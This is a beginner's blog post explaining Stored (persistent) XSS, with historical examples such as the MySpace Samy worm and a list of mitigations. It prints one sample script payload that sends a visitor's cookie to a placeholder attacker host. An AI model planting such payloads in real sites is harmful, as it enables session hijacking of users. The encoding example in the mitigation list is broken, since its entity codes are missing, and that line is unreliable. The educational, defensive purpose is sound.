Skip to content

Desi banjara

learn and grow together

  • Cross Site Scripting (XSS) Cross Site Scripting (XSS)
  • DOM-based XSS Cybersecurity
  • C# interview Questions – What is struct in C#? C# development
  • Interview questions – Microsoft Word Interview questions
  • Microsoft AZ-900 Certification Exam Practice Questions – 6 Microsoft AZ-900 Certification Exam
  • Microsoft AZ-220 Certification Exam Practice Questions – Part 4 Microsoft Exam AZ-220
  • Top 20 beginner level C# interview questions C# development
  • Scrum Master Certification Scrum Master Certification

What is Stored XSS?

Posted on March 8, 2023March 8, 2023 By DesiBanjara No Comments on What is Stored XSS?

Cross-Site Scripting (XSS) is a type of security vulnerability that allows attackers to inject malicious code into a web application. There are different types of XSS attacks, including Reflected XSS, DOM-based XSS, and Stored XSS. In this article, we will focus on Stored XSS and provide examples of how it works.

What is Stored XSS?

Stored XSS (also known as Persistent or Type 1 XSS) is a type of XSS attack where the malicious code is stored on the server and is executed when the victim accesses the affected page. Unlike Reflected XSS, where the malicious code is reflected back to the victim by the web application, Stored XSS attacks can affect multiple victims who access the affected page, as the malicious code is stored on the server and can be served to any user who visits the page.

How Stored XSS Works?

Stored XSS attacks usually start with the attacker finding a vulnerable web application that allows users to submit content that is stored on the server and then displayed to other users. This can be a comment section on a blog post, a message board, or a user profile.

The attacker then submits malicious code as part of their input, which is stored on the server. When a victim accesses the page containing the malicious code, the code is executed in their browser, giving the attacker access to the victim’s session data and other sensitive information.

For example, let’s say a social networking site allows users to post comments on their profiles. The site doesn’t properly sanitize user input, allowing attackers to submit malicious code as comments. The attacker submits a comment that contains the following malicious code:

<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script>

When a victim views the affected profile page, the malicious code is executed in their browser, and their session cookie is sent to the attacker’s server. The attacker can then use the session cookie to impersonate the victim and access their account.

Examples of Stored XSS Attacks

Here are some examples of real-world Stored XSS attacks:

  1. MySpace XSS Worm In 2005, a 21-year-old Samy Kamkar discovered a Stored XSS vulnerability on the MySpace social networking site. He used this vulnerability to create an XSS worm that infected over one million profiles in less than 24 hours.

The worm worked by injecting JavaScript code into the “About Me” section of user profiles. When a user viewed an infected profile, the code was executed in their browser, adding the user to Samy’s “top friends” list and displaying a message that read “But most of all, Samy is my hero”.

The worm spread rapidly, causing MySpace to shut down temporarily to fix the vulnerability.

  1. eBay Stored XSS In 2014, security researcher Klikki Oy discovered a Stored XSS vulnerability in eBay’s website. The vulnerability allowed an attacker to inject malicious code into product listings, which could be executed by any user who viewed the listing.

The vulnerability was caused by eBay’s failure to properly sanitize user input in the product description field. Klikki Oy was able to inject malicious code that would steal the victim’s eBay session cookie and send it to the attacker’s server.

  1. WordPress Stored XSS In 2016, security researcher Dawid Golunski discovered a Stored XSS vulnerability in the WordPress content management system. The vulnerability allowed an attacker to inject malicious code into a WordPress post or page, which could be executed by any user who viewed the post or page.

The vulnerability was caused by a failure to properly sanitize user input in the post or page content. Dawid was able to inject a script that would steal the victim’s WordPress session cookie and send it to the attacker’s server.

Mitigating Stored XSS Attacks

To mitigate Stored XSS attacks, web developers and organizations can take the following measures:

  1. Input validation and sanitization: Input validation and sanitization are important to prevent attackers from injecting malicious code into a website. Input validation involves verifying that the input data meets certain criteria, such as the length and format of the data, to ensure that it is safe to use. Sanitization involves removing any potentially dangerous characters from the input data. For example, a website that allows users to enter comments should validate the length of the comment and sanitize it by stripping out any HTML tags or special characters that could be used to inject malicious code.
  2. Encoding user input: Encoding user input involves converting special characters into their corresponding entity codes to prevent them from being interpreted as code by the browser. For example, the ‘<‘ character can be encoded as ‘<‘, and the ‘>’ character can be encoded as ‘>’. This prevents attackers from injecting malicious code into the website that could be executed by the browser.
  3. Implement Content Security Policy (CSP): Content Security Policy is a security measure that can be implemented on a website to prevent XSS attacks. It allows website owners to define a set of rules that determine which resources can be loaded by a page, and which types of code can be executed. CSP can be used to prevent inline scripts and the use of unsafe inline styles, as well as restrict the loading of external resources from untrusted sources. Implementing a strong CSP can help to prevent XSS attacks.
  4. Use HTTPS: Implementing HTTPS on your website ensures that all data transmitted between the user’s browser and your server is encrypted. This prevents attackers from intercepting sensitive data or injecting malicious code. HTTPS also helps to verify the identity of the website and prevent man-in-the-middle attacks.
  5. Regularly update software: Regularly updating software used on a website, including any third-party plugins or libraries, is important to ensure that known vulnerabilities are patched. Attackers can exploit vulnerabilities in outdated software to inject malicious code into a website. Regularly updating software helps to prevent these types of attacks.
  6. Educate users: Educating users is an important step to prevent XSS attacks. This can include advising them to never click on suspicious links or download unknown files. Users should also be advised to use strong passwords and to avoid reusing the same password across multiple websites. Additionally, users should be encouraged to report any suspicious activity or content they encounter while using the website.

 

Stored XSS attacks Tags:Cross Site Scripting (XSS), Stored XSS attacks, XSS

Post navigation

Previous Post: Cross Site Scripting (XSS)
Next Post: Reflected XSS

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *



Archives

  • March 2023
  • February 2023
  • January 2023
  • December 2022
  • November 2022
  • March 2022
  • February 2022
  • June 2021
  • March 2021
  • January 2021
  • December 2020
  • November 2020
  • October 2020
  • September 2020
  • July 2020
  • June 2020
  • April 2020
  • December 2018
  • September 2018
  • August 2018
  • July 2018
  • June 2018
  • May 2018
  • September 2017
  • July 2017
  • May 2017
  • April 2017
  • November 2013

Categories

  • Agile Software development
  • Agile Software development
  • Amazon AWS Certification Exam
  • Amazon EC2
  • Amazon ECS
  • Amazon Web Services
  • Amazon Web Services (AWS)
  • Apache Kafka
  • API development
  • ASP.NET Core
  • ASP.Net MVC
  • ASP.NET Web API
  • Atlassian Jira
  • AWS DevOps Engineer Professional Exam
  • AWS Lambda
  • AZ-300: Microsoft Azure Architect Technologies Exam
  • Azure
  • Azure Active Directory
  • Azure AI and ML services
  • Azure App Service
  • Azure App Services
  • Azure Cognitive Services
  • Azure Compute
  • Azure Data and Storage
  • Azure Data Factory
  • Azure Data Lake Storage
  • Azure Databricks
  • Azure Databricks
  • Azure Defender
  • Azure Devops
  • Azure Functions
  • Azure IaaS
  • Azure Internet of Things (IoT)
  • Azure landing zone
  • Azure Logic Apps
  • Azure Machine Learning
  • Azure Machine Learning
  • Azure Migration
  • Azure Mobile Apps
  • Azure Networking – VNET
  • Azure Networking services
  • Azure Security
  • Azure Security
  • Azure security tools for logging and monitoring
  • Azure Sentinel
  • Azure Sentinel – Data connectors
  • Azure Serverless Computing
  • Azure SQL
  • Azure SQL Database
  • Azure Storage
  • Azure Stream Analytics
  • Azure Synapse Analytics
  • Azure Virtual Machine
  • Azure VNET
  • Business
  • C# development
  • C# interview questions with answers
  • ChatGPT
  • CI/CD pipeline
  • CISSP certification
  • Cloud
  • Cloud computing
  • Cloud services
  • COBIT
  • Command Query Responsibility Segregation (CQRS) Pattern
  • Continuous Integration
  • conversational AI
  • Cross Site Scripting (XSS)
  • cyber breaches
  • Cybersecurity
  • Data Analysis
  • Database
  • DevOps
  • DevSecOps
  • DOM-based XSS
  • Domain-Driven Design (DDD)
  • Dynamic Application Security Testing (DAST)
  • Enterprise application architecture
  • Event-Driven Architecture
  • GIT
  • gmail api
  • Google
  • Google Ads
  • Google AdSense
  • Google Analytics
  • Google analytics interview questions with answers
  • Google Cloud Platform (GCP)
  • Google Docs
  • Google Drive
  • Google search console
  • HTML
  • Information security
  • Infrastructure as a Service (IaaS)
  • Internet of Things (IoT)
  • Interview questions
  • IT governance
  • IT Infrastructure networking
  • IT/Software development
  • Javascript interview questions with answers
  • Layered Pattern
  • Leadership Quote
  • Life lessons
  • Low-code development platform
  • Microservices
  • Microservices
  • Microsoft
  • Microsoft 365 Defender
  • Microsoft AI-900 Certification Exam
  • Microsoft AZ-104 Certification Exam
  • Microsoft AZ-204 Certification Exam
  • Microsoft AZ-900 Certification Exam
  • Microsoft Azure
  • Microsoft Azure certifications
  • Microsoft Azure Log Analytics
  • Microsoft Cloud Adoption Framework
  • Microsoft Exam AZ-220
  • Microsoft Exam AZ-400
  • Microsoft Excel
  • Microsoft Office
  • Microsoft Teams
  • Microsoft word
  • Model-View-Controller (MVC) Pattern
  • Monitoring and analytics
  • NoSQL
  • OpenAI
  • OutSystems
  • PL-100: Microsoft Power Platform App Maker
  • PL-200: Microsoft Power Platform Functional Consultant Certification
  • PL-900: Microsoft Power Platform Fundamentals
  • Platform as a Service (PaaS)
  • postman
  • Postman
  • Project management
  • Python interview questions with answers
  • Ransomware
  • Reflected XSS
  • RESTful APIs
  • SC-100: Microsoft Cybersecurity Architect
  • Scrum Master Certification
  • Service-oriented architecture (SOA)
  • Software architecture
  • Software as a Service (SaaS)
  • SonarQube
  • Splunk
  • SQL
  • SQL Azure Table
  • SQL Server
  • Static Application Security Testing (SAST)
  • Stored XSS attacks
  • Table Storage
  • Test Driven Development (TDD)
  • Top technology trends for 2023
  • User Experience (UX) design
  • WCF (Windows Communication Foundation)
  • Web development
  • Zero Trust strategy



Recent Posts

  • Command Query Responsibility Segregation (CQRS) Pattern
  • Dynamic Application Security Testing (DAST)
  • Static Application Security Testing (SAST)
  • Infrastructure as Code (IaC)
  • Continuous Integration/Continuous Deployment (CI/CD)

Recent Comments

    • SC-100: Microsoft Cybersecurity Architect SC-100: Microsoft Cybersecurity Architect
    • Dynamic Application Security Testing (DAST) Dynamic Application Security Testing (DAST)
    • Interview question: What is the purpose of β€œis” operator in C#? C# development
    • What are the benefits, advantages of cloud computing? Cloud
    • Top Amazon Web Services (AWS) Interview Questions Amazon Web Services
    • Famous Buddha Quotes on Life Life lessons
    • Interview question: What is encapsulation? C# development
    • Microsoft AZ-220 Certification Exam Practice Questions – Part 4 Microsoft Exam AZ-220

    Copyright © 2023 Desi banjara.

    Powered by PressBook News WordPress theme